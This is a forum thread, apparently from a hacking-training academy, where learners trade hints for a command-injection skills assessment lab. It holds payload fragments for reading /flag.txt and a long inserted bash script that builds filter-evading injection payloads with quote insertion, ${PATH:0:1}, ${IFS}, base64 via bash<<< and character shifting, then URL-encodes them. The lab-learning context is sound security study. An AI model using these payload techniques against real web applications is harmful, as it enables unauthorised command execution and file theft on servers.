Academy | Command Injections - Skills Assessment

Feel free to DM me at any time. I am East Coast US, so keep that in mind. It sounds like you are there, have you tried getting the flag to display in that error message? Or maybe copying? If you are using mv maybe it will not work.

If you are still having trouble, just DM me with a screenshot, or the line of code you are using on the target server.
-onthesauce


Thanks a lot @onthesauce! I thought that I’d already tried to do that yesterday. But with a fresh set of eyes today and your cp tips I’ve managed to get the flag.

Happy hacking!

Thanks for the instructions.

I did find the injection point and I am getting the “malicious” message.

I have tried various ways to obfuscate the requests.

For example, the request below:

Gives this response:
Error while moving: mv: cannot stat ‘/var/www/html/files/2561732172.txt’: No such file or directory
mv: cannot move ‘/flag.txt’ to ‘/var/www/html/files/tmp/flag.txt’: Permission denied

The system (index.php file) understands the request, but one cannot write to the tmp directory.

Could you elaborate on the hint: “<<<”
Do you mean to obfuscate the file name only or a whole new command like “cat /flag.txt”?

Thanks a lot.

I think you might be trying to do the same thing as me, which I don’t know if it is possible, but that is to move the flag.txt to the directory so I could then open and read it. Instead, however, I found it much easier to try and get the file to dump its contents to an error message.

Was stuck at this for quite some time - for anyone struggling, here is (roughly) how the process of solving this one goes:

  1. Make a list of all operations you have access to - e.g. search, copy, move
  2. Check which ones make network requests - this should only leave you with 2 requests to focus on.
  3. Check which parameters they have - from, to, finish etc.
  4. Don’t focus on any specific one of these parameters; I wasted quite some time on one, only to solve it with another.
  5. After you’ve decided which parameter to start testing with, you need the following - a way to start a subshell ( &&, || or ; ) and a goal (do you want to move the flag to a directory and read it, do you want to cat its contents? If catting - what output to - the page, or an error message?).
  6. After you’ve thought about this, craft different payloads to test. Will you obfuscate your command through base64? Or inserting quote marks between some characters? Try different things. Remember that some characters are blacklisted, so you will have to substitute them using PATH or something else, as other posters have said before.

It was quite the frustrating exercise - I was super close from the get-go, but the errors threw me off and I wasted a lot of time afterwards crafting other payloads & trying commix (an automated tool for OS command injection detection :smiley: ).

Hope this helps someone - if you’re still stuck DM me and I might be able to give you a better nudge.

I didn’t find a correct solution, but read the flag using the ‘-b’ switch for a server script that uses ‘mv’. Hack the planet haha :joy:

Ok. Got it. Little hint, not directly a solution: ‘((ob))’, yes, I know, but it’s not what you think it is. Change something and fill in between the brackets and be sure to use money for it. :grinning:

With some tips I managed to get this question after some hard thinking!
If anyone needs a nudge in the right direction feel free to DM me

Solved.

  1. Click on all buttons (Copy, Move).
  2. Find the right place (Can be at the start of the file) to put injection operators ( | || %0a).
  3. Bypass filters for c"o"m"m"a"n"d and filtered characters.
  4. Find the good syntax to read the flag

Message me if you need hint :slight_smile:

This was a tough one. I found it helpful to do like they were saying and:

  • Manually explore every button in the web app (while logging everything in BurpSuite or OWASP ZAP)
  • Make note of any new HTTP Parameters as you’re going as the application acts differently depending on what parameters are supplied.
  • Keep an eye out for the visual error that they were talking about, “Malicious request”, as this is a good sign that you might be hitting input validation
  • Ask yourself why something may need input validation? Developers aren’t going to put input validation in places where it isn’t needed.

Guys, does anybody know why the “character shifting” technique for “&” doesn’t work here? It accepts %26, but $(tr%09'!-}'%09'"-~'<<<%) results in an error.

Okay, I got the flag. Try to use base64 encoding guys and take a good look at “copying”

Hi Wathix,

Can you help with this please? I’ve been stuck on this assessment for a week now. I would greatly appreciate it.

Hi Swindler,

I’ve been trying all different ways the past week. Can you share how you were able to dump the contents of the flag in an error msg? I’m clicking on the Move folder, then injecting my command after the “to=” on the GET request. I’m getting different error messages, but it’s only showing exactly what I type in instead of the contents of the flag. Please help!

Do you still need help with this?

Yes please if you don’t mind helping. I’ve tried probably a hundred different things with this being the most recent:

Use the base64 encoded payload shown in the module to read the flag

echo  -n 'cat /flag.txt' | base64

You need to substitute / with something else (from previous modules, ${PA…}) in the above command. You can take that output and inject it using the below method:
'bash<<<…'

In the URL after to= make sure you substitute characters for spaces and || or & as well. Once you insert the right payload use the move option to display the flag.

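An added example, not code from this thread or from the lab itself, that ties together the bypass pieces discussed in the posts above (the step list, the `${PA…}` plus `bash<<<…` recipe, and the character-shifting question): it builds a Linux payload against a constructed blacklist, checks it locally against a constructed target file, and percent-encodes it for a GET parameter such as `to=`. The blacklist, the target file and every function name here are assumptions for the demo; the real filter has to be found by probing.

```bash
#!/bin/bash
# Added example, not code from the thread or from the lab: builds the kind of
# filter-evading Linux command-injection payload the posts above describe and
# checks it locally. The blacklist is constructed for the demo; the lab's real
# filter must be discovered by probing (the "malicious request" response).

BLACKLIST_CHARS='[ ;&|/]'   # constructed: characters the demo filter rejects
BLACKLIST_WORDS='cat|flag'  # constructed: words the demo filter rejects

# Return 0 if the payload contains no blacklisted character or word.
passes_filter() {
    if printf '%s\n' "$1" | grep -q "$BLACKLIST_CHARS"; then return 1; fi
    if printf '%s\n' "$1" | grep -Eqi "$BLACKLIST_WORDS"; then return 1; fi
    return 0
}

# Character shifting: print the character one code point above $1, so a
# blacklisted character can be produced from an allowed one (% -> &, [ -> \).
# In a request this is written as $(tr '!-}' '"-~'<<<%) and the shell does it.
shift_char() {
    printf '%s' "$1" | tr '!-}' '"-~'
}

# Quote insertion: put "" between adjacent letters, so no filtered word
# survives as a substring (cat -> c""at) but bash still runs the same command.
quote_words() {
    printf '%s' "$1" | sed 's/\([A-Za-z]\)\([A-Za-z]\)/\1""\2/g'
}

# Replace '/' with ${PATH:0:1} (first char of PATH, '/' on any normal Linux)
# and spaces with ${IFS}; both expand only once the target shell runs them.
hide_slashes() { printf '%s' "$1" | sed 's#/#${PATH:0:1}#g'; }
hide_spaces()  { printf '%s' "$1" | sed 's/ /${IFS}/g'; }

# Unencoded payload: quote the words first, then hide slashes and spaces
# (the expansions contain letters and must not be quoted themselves).
build_plain_payload() {
    _p=$(quote_words "$1")
    _p=$(hide_slashes "$_p")
    hide_spaces "$_p"
}

# Encoded payload: bash<<<$(base64${IFS}-d<<<ENCODED). The command itself never
# reaches the filter, but base64 output can contain '/' (or a filtered word by
# chance), so a few leading-space alignments are tried before giving up.
build_b64_payload() {
    _pad=''
    for _i in 0 1 2 3 4 5; do
        _enc=$(printf '%s' "$_pad$1" | base64 | tr -d '\n')
        _payload="bash<<<\$(base64\${IFS}-d<<<$_enc)"
        if passes_filter "$_payload"; then
            printf '%s' "$_payload"
            return 0
        fi
        _pad="$_pad "
    done
    return 1
}

# Percent-encode every byte for a GET parameter such as to=...; this is also
# why a literal & must be sent as %26: a bare & ends the parameter instead.
urlencode() {
    printf '%s' "$1" | od -An -v -tx1 | tr -d ' \n' | sed 's/../%&/g'
}

# Run a payload the way the vulnerable script would: handed to bash.
run_payload() {
    bash -c "$1"
}

# Local demonstration against a constructed file, not the lab's flag.
demo() {
    _dir=$(mktemp -d)
    printf 'demo-secret\n' > "$_dir/flag.txt"
    echo "original : cat $_dir/flag.txt"
    passes_filter "cat $_dir/flag.txt" || echo "filter   : original is rejected"
    _plain=$(build_plain_payload "cat $_dir/flag.txt")
    echo "plain    : $_plain"
    echo "output   : $(run_payload "$_plain")"
    _b64=$(build_b64_payload "cat flag.txt")
    echo "base64   : $_b64"
    echo "output   : $(cd "$_dir" && run_payload "$_b64")"
    echo "as param : to=$(urlencode "$_plain")"
    rm -rf "$_dir"
}
demo
```

The `$(tr …)` form from the question about `&` is what `shift_char` computes locally; in a URL the separators go in as `%09` (tab) or `${IFS}`, and the finished payload is percent-encoded as a whole, so a literal `&` has to travel as `%26` or the parameter is cut short before the server ever sees it.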

I managed to solve this skill assessment, but I don’t understand why.

Like, I get the server is not blacklisting the “.”, but why does the “” which basically returns a “.” not give the same result? I tested both commands on my terminal, and both commands produce the same final result (&cat /flag.txt)

Can someone clarify to me why? Thanks!


The ‘<’ characters may be blacklisted by the server, that’s probably why the second payload is not working

Nice challenge. Used cp instead of cat.


Thank you to everyone who contributed tips; you were all very helpful. My piece of advice would be to try and get an error in your Burp requests that gives you an idea of what commands are being run and in what syntax while messing around with the different fields of injection. Once you’ve got the syntax, all you need to do is bypass filters and find the proper payload.